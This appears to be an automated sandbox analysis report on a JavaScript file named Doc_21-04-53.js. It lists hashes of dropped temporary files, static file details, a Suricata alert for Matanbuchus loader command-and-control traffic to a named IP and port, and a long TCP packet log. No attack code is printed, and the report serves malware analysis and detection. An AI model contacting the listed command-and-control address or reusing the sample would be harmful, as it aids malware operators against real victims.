MD5:	5946A42C6C8F2245F33FB916C59E49DE
SHA1:	B824FC463DF3224105CC5B28AA314B70780FF474
SHA-256:	44528A83120FA4D754AE2F156471CE3A49AFF30CCAF23C395AB79E33870B84F1
SHA-512:	CF46947FAA0B7B2CA31D14C5F39A9BC49E1B67CB4853696AE568C5298D4F270F4A59A3CB98F4CECBCB5369FCABBB562D4A3D9885E6A8FF7C0B82E24BBFA2A103
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFCB9A800DFF17C097.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2560516444161327
Encrypted:	false
SSDEEP:	48:SiLuxNvGFXOHT5+jCOfDS4OfdAErCyoq9FuSiEOfDS4OfxTBQ:5LBKTsCybvwCkFWEyb
MD5:	D81ED92415EFD1F2A65B508309B9B493
SHA1:	43316AB0EE851A6238225094C2A65C45FAA533C6
SHA-256:	FB863B95E7E2AB2C8C043B3311D901EA022203D48C402B5D8A2102C61D1C25C7
SHA-512:	72DEF9B84480F2BEA361B5BF28444D2F066AA3EFE9F4EF8F8550D73E049DF897ACDBCA6E5B964427238803D08E987CAA598678120D634CBC5A7A8E15374B3545
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE228E5054C1FE988.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.879433038601054
TrID:
File name:	Doc_21-04-53.js
File size:	977 bytes
MD5:	c10e7bce33b8d71ecd178565a63bb4ed
SHA1:	b2c32607a225fe745dd4d1f40e78578621728be1
SHA256:	09b473434edae856dc199c34092a9b4a9f735a0b0aeb1a03828fa215d1ce0237
SHA512:	10fd15544b0d676d45a9a07e06f3563949d9c2f8b7382b8f086777e0e1e482ee095fb4e8b4e8d8892940ed8d0dbb16dc293d998c38017a46e1c9e90b871871dc
SSDEEP:	24:dEsmSj2wouYUuKR+s0AXDRoiUMboz7I7GFD+NumTqYhjA:dEsMi58GoitoIatSuajA
TLSH:	F2111C46CD13EEE402BAA2D44EE96538CEE151804124E5E5BC9FF3F0569DB240A30EDB
File Content Preview:	// SIG // Begin signature block..// SIG // o3lghrkNHmy95KKmEUisGHk9XLVusIYcXP1r6PEi..// SIG // 8kZbJanxZdXnKYheZv9PqqIuiorVULYcBwh1IyC1..// SIG // RG7j6z5EYrWmDefQjBTtgJ1uqTmEDYvwz8q4Ltbw..// SIG // DCWxNnJe3bbnETsCUaHdDYHnlZRW3EYv5PFJpcP5..// SIG // q52n

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T22:11:58.099476+0100	2034468	ET MALWARE Matanbuchus Loader CnC M3	1	192.168.2.5	49785	185.234.216.175	4443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:11:03.061937094 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:03.061997890 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:03.062226057 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:03.063940048 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:03.063954115 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:04.288217068 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:04.288316011 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:04.343190908 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:04.343226910 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:04.343646049 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:04.394279957 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:04.601475000 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:04.647330046 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.069020987 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.069334030 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.069365978 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.069391012 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.069397926 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.069433928 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.069458961 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.070287943 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.070329905 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.070343971 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.077517033 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.077563047 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.077579021 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.094177961 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.094233990 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.094255924 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.142429113 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.188946962 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.236057043 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.236078978 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.264698029 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.264781952 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.264836073 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.264868021 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.264935970 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.270816088 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.278605938 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.278686047 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.278707981 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.286891937 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.286958933 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.286976099 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.294336081 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.294400930 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.294416904 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.302268982 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.302341938 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.302359104 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.310132027 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.310204983 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.310220957 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.318089962 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.318185091 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.318200111 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.325728893 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.325836897 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.325850964 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.333605051 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.333700895 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.333714008 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.340986013 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.341070890 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.341085911 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.354897022 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.354984999 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.354991913 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.355012894 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.355058908 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.452994108 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.456418991 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.456490993 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.456628084 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.456659079 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.456708908 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.470865965 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.470875978 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.471086979 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.475337982 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.475398064 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.484083891 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.484256983 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.484282970 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.492360115 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.492427111 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.492449999 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.492491961 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.496663094 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.496717930 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.504807949 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.504873037 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.504920959 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.513219118 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.513276100 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.513294935 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.513341904 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.517288923 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.521425009 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.521486044 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.521506071 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.525644064 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.525687933 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.525701046 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.529690981 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.529735088 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.529746056 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.533879995 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.533926964 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.533937931 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.538151026 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.538201094 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.538212061 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.538254023 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.542150021 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.550481081 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.550533056 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.550550938 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.550592899 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.554701090 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.554760933 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.578020096 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.578108072 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.645987034 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.646087885 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.653464079 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.653549910 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.653567076 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.660233021 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.660304070 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.660314083 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.660367012 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.663727999 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.663805008 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.666980982 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.667035103 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.673336029 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.673396111 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.676423073 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.676501036 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.682274103 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.682332039 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.685204029 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.685254097 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.685296059 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.685338974 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.691006899 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.691061974 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.694005966 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.694067001 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.694133043 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.694170952 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.699872017 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.699932098 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.699965954 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.700007915 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.702898979 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.702948093 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.706187010 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.706244946 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.707946062 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.707998037 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.708947897 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.708996058 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.710715055 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.710762978 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.714282990 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.714343071 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.717788935 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.717845917 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.721251011 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.721306086 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.722999096 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.723052979 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.724757910 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.724807978 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.731966019 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.731973886 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.732021093 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.732044935 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.732074976 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.732088089 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.733743906 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.733788967 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.733797073 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.764784098 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.764877081 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.764920950 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.770380974 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.770412922 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.770457029 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.770489931 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.770504951 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.814327002 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.845407009 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.845416069 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.845451117 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.845460892 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.845484972 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.845536947 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.845554113 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.845580101 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.852324963 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.852390051 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.852408886 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.855865002 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.855923891 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.855931997 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.857619047 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.857659101 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.857666016 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.859514952 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.859560013 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.859568119 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.861164093 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.861206055 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.861213923 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.863065004 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.863110065 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.863116980 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.864660978 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.864706993 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.864713907 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.866215944 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.866267920 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.866276026 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.867664099 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.867701054 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.867708921 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.870630980 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.870687962 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.870702028 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.873650074 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.873706102 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.873714924 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.882462025 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.882493019 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.882543087 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.882556915 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.882570028 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.882596016 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.884044886 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.884098053 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.886331081 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.886389017 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.889249086 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.889307976 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.891319036 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.891370058 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.892558098 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.892611980 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.894490004 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.894537926 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.895674944 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.895720959 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.897583961 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.897631884 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.898729086 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.898768902 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.900651932 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.900703907 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.902731895 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.902786970 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.903919935 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.903965950 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.905834913 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.905898094 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:05.906872034 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:05.906919003 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.029522896 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.029665947 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.032687902 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.032725096 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.032763958 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.032788038 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.032800913 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.034499884 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.034563065 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.034581900 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.036197901 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.036256075 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.036266088 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.036302090 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.037295103 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.037353992 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.039102077 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.039155960 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.041850090 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.041914940 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.043662071 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.043723106 CET	49704	443	192.168.2.5	104.21.40.3
Dec 6, 2024 22:11:06.048146009 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.048175097 CET	443	49704	104.21.40.3	192.168.2.5
Dec 6, 2024 22:11:06.048207998 CET	49704	443	192.168.2.5	104.21.40.3
